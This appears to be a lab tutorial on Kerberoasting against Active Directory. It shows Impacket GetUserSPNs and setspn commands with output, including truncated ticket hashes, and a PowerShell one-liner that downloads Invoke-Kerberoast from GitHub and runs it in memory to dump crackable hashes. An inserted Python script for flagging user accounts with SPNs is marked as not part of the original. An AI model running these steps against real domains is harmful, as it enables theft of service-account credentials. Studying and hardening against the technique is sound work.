Kerberoasting

Kerberoasting method 1.

From Linux
Locations of the Impacket GetUserSPNs.py script in Kali

/opt/CrackMapExec/cme/thirdparty/impacket/examples/GetUserSPNs.py
/usr/share/doc/python-impacket/examples/GetUserSPNs.py
/usr/local/bin/GetUserSPNs.py

root@kali:/opt# GetUserSPNs.py -request -dc-ip 192.168.1.20 EVILCORP.local/Administrator
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName           Name  MemberOf  PasswordLastSet      LastLogon 
-----------------------------  ----  --------  -------------------  ---------
DC-1/svc.EVILCORP.local:60111  svc             2019-08-04 15:46:07  <never>   



$krb5tgs$23$*svc$EVILCORP.LOCAL$DC-1/svc.EVILCORP.local~60111*$4b970c634fdc8d45e054444fae9ae498$...


-------------------------------------------------------------------------------------

Scanning for SPNs in Windows
dsquery * "ou=domain controllers,dc=yourdomain,dc=com" -filter "(&(objectcategory=computer)(servicePrincipalName=*))" -attr distinguishedName servicePrincipalName > spns.txt


---------------------------------------------------------------------------------------
From Windows in a test lab
Create a service account, which is basically a regular user account.


Create an SPN for the service account


C:\Users\Administrator>setspn -a "DC-1/svc.EVILCORP.local:60111" "EVILCORP.local\svc"
Registering ServicePrincipalNames for CN=svc svc,DC=EVILCORP,DC=local
        DC-1/svc.EVILCORP.local:60111
Updated object



C:\Users\Administrator>setspn -T EVILCORP.LOCAL -Q */*
Checking domain DC=EVILCORP,DC=local
CN=DC-1,OU=Domain Controllers,DC=EVILCORP,DC=local
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC-1.EVILCORP.local
        HOST/DC-1/EVILCORP
        ldap/DC-1/EVILCORP
        ldap/DC-1.EVILCORP.local/ForestDnsZones.EVILCORP.local
        ldap/DC-1.EVILCORP.local/DomainDnsZones.EVILCORP.local
        NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/DC-1.EVILCORP.local
        DNS/DC-1.EVILCORP.local
        GC/DC-1.EVILCORP.local/EVILCORP.local
        RestrictedKrbHost/DC-1.EVILCORP.local
        RestrictedKrbHost/DC-1
        HOST/DC-1.EVILCORP.local/EVILCORP
        HOST/DC-1
        HOST/DC-1.EVILCORP.local
        HOST/DC-1.EVILCORP.local/EVILCORP.local
        ldap/DC-1.EVILCORP.local/EVILCORP
        ldap/DC-1
        ldap/DC-1.EVILCORP.local
        ldap/DC-1.EVILCORP.local/EVILCORP.local
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/c6ba183e-8815-45c3-bf1e-a97f467e73bb/EVILCORP.local
        ldap/c6ba183e-8815-45c3-bf1e-a97f467e73bb._msdcs.EVILCORP.local
CN=krbtgt,CN=Users,DC=EVILCORP,DC=local
        kadmin/changepw
CN=LAB-1-WIN10,CN=Computers,DC=EVILCORP,DC=local
        RestrictedKrbHost/LAB-1-WIN10
        HOST/LAB-1-WIN10
        RestrictedKrbHost/LAB-1-WIN10.EVILCORP.local
        HOST/LAB-1-WIN10.EVILCORP.local
CN=LAB-2-WIN10,CN=Computers,DC=EVILCORP,DC=local
        RestrictedKrbHost/LAB-2-WIN10
        HOST/LAB-2-WIN10
        RestrictedKrbHost/LAB-2-WIN10.EVILCORP.local
        HOST/LAB-2-WIN10.EVILCORP.local
CN=svc svc,DC=EVILCORP,DC=local
        DC-1/svc.EVILCORP.local:60111
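
A defensive use of the `setspn -Q */*` listing above, as an added example that is not part of the original post: it parses that output and reports the objects outside the default machine containers that hold an SPN, which are the password-based service accounts to review. The container names and the `krbtgt` exclusion are assumptions about a default Active Directory layout, and the sample input is constructed from the lab output.

```python
import re

# Constructed sample: abbreviated `setspn -T <domain> -Q */*` output in the
# layout shown above (object DN flush left, its SPNs indented beneath it).
SAMPLE = """\
Checking domain DC=EVILCORP,DC=local
CN=DC-1,OU=Domain Controllers,DC=EVILCORP,DC=local
        HOST/DC-1.EVILCORP.local
CN=krbtgt,CN=Users,DC=EVILCORP,DC=local
        kadmin/changepw
CN=LAB-1-WIN10,CN=Computers,DC=EVILCORP,DC=local
        HOST/LAB-1-WIN10
CN=svc svc,DC=EVILCORP,DC=local
        DC-1/svc.EVILCORP.local:60111
"""

# Assumption: machine accounts sit in the default containers; their passwords
# are long, random and rotated automatically, so they are skipped.
MACHINE_CONTAINERS = re.compile(r",(CN=Computers|OU=Domain Controllers),", re.I)
IGNORED = {"krbtgt"}  # disabled built-in account that always holds kadmin/changepw

def parse_setspn(text):
    """Return {distinguished_name: [spn, ...]} from setspn -Q output."""
    objects, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t":                      # indented: SPN of current object
            if current is not None:
                objects[current].append(line.strip())
        elif re.match(r"(CN|OU)=", line, re.I):   # flush-left DN opens an object
            current = line.strip()
            objects[current] = []
        else:                                     # banner or status line
            current = None
    return objects

def user_accounts_with_spn(objects):
    """Objects outside the machine containers, i.e. password-based accounts."""
    flagged = {}
    for dn, spns in objects.items():
        cn = dn.split(",", 1)[0][3:].lower()
        if spns and cn not in IGNORED and not MACHINE_CONTAINERS.search(dn):
            flagged[dn] = spns
    return flagged

if __name__ == "__main__":
    for dn, spns in user_accounts_with_spn(parse_setspn(SAMPLE)).items():
        print(f"user account with SPN, review password and encryption: {dn} {spns}")
```

Each account it reports is a candidate for a long random password, AES-only Kerberos encryption, or conversion to a group managed service account.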


C:\Users\Administrator>powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat


TicketByteHexStream  :
Hash                 : $krb5tgs$23$*svc$EVILCORP.local$DC-1/svc.EVILCORP.local:60111*$...
SamAccountName       : svc
DistinguishedName    : CN=svc svc,DC=EVILCORP,DC=local
ServicePrincipalName : DC-1/svc.EVILCORP.local:60111
